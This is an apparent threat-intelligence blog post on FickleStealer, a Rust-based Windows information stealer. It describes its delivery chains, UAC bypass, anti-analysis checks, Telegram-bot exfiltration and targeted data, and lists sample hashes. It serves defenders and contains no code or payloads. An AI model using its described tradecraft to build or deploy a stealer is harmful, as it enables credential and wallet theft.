Executive Summary
FickleStealer is a Rust-based stealer that targets Windows devices. It is distributed in a variety of ways and steals information, likely with the intent of using the information for follow-on attacks.
Key Takeaways
- FickleStealer is a Rust-based stealer that targets Windows devices.
- FickleStealer is distributed using at least four different methods, including a VBA dropper, a VBA downloader, a link downloader, and an executable downloader.
- The attack chain uses PowerShell scripts to bypass UAC, escalate privileges, and execute the malware.
- The stealer can steal a variety of information including that from crypto wallets, web browsers, AnyDesk, Discord, FileZilla, Signal, Skype, Steam, and Telegram.
What is FickleStealer?
FickleStealer is a Rust-based stealer that targets Windows devices. It is distributed in a variety of ways and steals information, likely with the intent of using the information for follow-on attacks. Fortinet discovered the malware in May 2024 and recently reported on FickleStealer.
FickleStealer is distributed using at least four different attack methods, including a VBA dropper, a VBA downloader, a link downloader, and an executable downloader.
- The VBA dropper attack chain begins with a Word document containing a macro that loads an XML file and executes an encoded script in that file.The script, in turn, drops and executes FickleStealer.
- The VBA downloader attack chain leverages Word documents. One downloader downloads the PowerShell script bypass.ps1 directly. A second leverages an executable to evade detections that limit the use of cmd. A third indirectly delivers the VBA downloader using an embedded web browser control in the document.
- The link downloader directly downloads the PowerShell script.
- The executable downloader is a DotNet executable masquerading as a PDF viewer.
The attack chain uses PowerShell scripts to bypass UAC, escalate privileges, and execute the malware. A PowerShell script also sends information about the victim’s machine to a threat actor controlled Telegram bot.
FickleStealer’s payload is protected by a packer masquerading as a legal executable. It is likely the threat actor developed the packer by replacing a portion of the code in a legal executable with the packer’s code, allowing it to avoid static analysis. The payload runs a series of anti-analysis checks to check for the presence of sandbox and virtual machine environments prior to beaconing to a remote server to exfiltrate data.
The stealer can steal a variety of data including that from crypto wallets, web browsers, AnyDesk, Discord, FileZilla, Signal, Skype, Steam, and Telegram. It is capable of exporting files with the following extensions: .txt, .kdbx, .pdf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .odp, and wallet.dat. FickleStealer is also flexible in that it can receive a target list from the server. According to Fortinet, FickleStealer appears to still be in active development and is considered a high-severity threat.
IOCs
PolySwarm has multiple samples associated with this activity.
ad57cc0508d3550caa65fcb9ee349c4578610970c57a26b7a07a8be4c8b9bed9
8d3ccfafc39830ee2325170e60a44eca4a24c9c4dd682a84fa60c961a0712316
7034d351ce835d4905064d2b3f14adb605374a4a6885c23390db9eddd42add86
c6c6304fea3fd6f906e45544b2e5119c24cda295142ed9fafd2ec320f5ff41cc
47e4142fa6ab10a2d7dc0423d41f9bdbb3ced0f4fae5c58b673386d11dd8c973
4602d8f9e2150744e89958d813354696abe6800ee55ef70c48db3134e964a13a
f080d7803ce1a1b9dc72da6ddf0dd17e23eb8227c497f09aa7dfd6f3b5be3a66
e9bc44cf548a70e7285499209973faf44b7374dece1413dfcdc03bf25a6c599c
bfe2d817e20ecff45cc92b7b8f4e1cd0482b48a769940402eaa5b31cbfb9b908
You can use the following CLI command to search for all FickleStealer samples in our portal:
$ polyswarm link list -f FickleStealer
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.
